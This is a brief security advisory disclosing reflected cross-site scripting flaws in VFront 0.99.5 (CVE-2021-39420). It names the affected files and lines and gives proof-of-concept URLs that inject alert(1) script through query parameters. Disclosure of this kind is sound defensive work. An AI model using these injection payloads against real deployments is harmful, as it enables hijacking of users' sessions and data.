Cross site scripting in VFront v0.99.5
Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:
file: search_all.php line: 104 exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1); file: add.attach.php line: 351 exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1); Notes: the parameter 't' must be the name of an existing table inside the database managed by vfront.
Above vulnerabilities are published at CVE-2021-39420
This vulnerability was detected as part of the DARPA CHESS program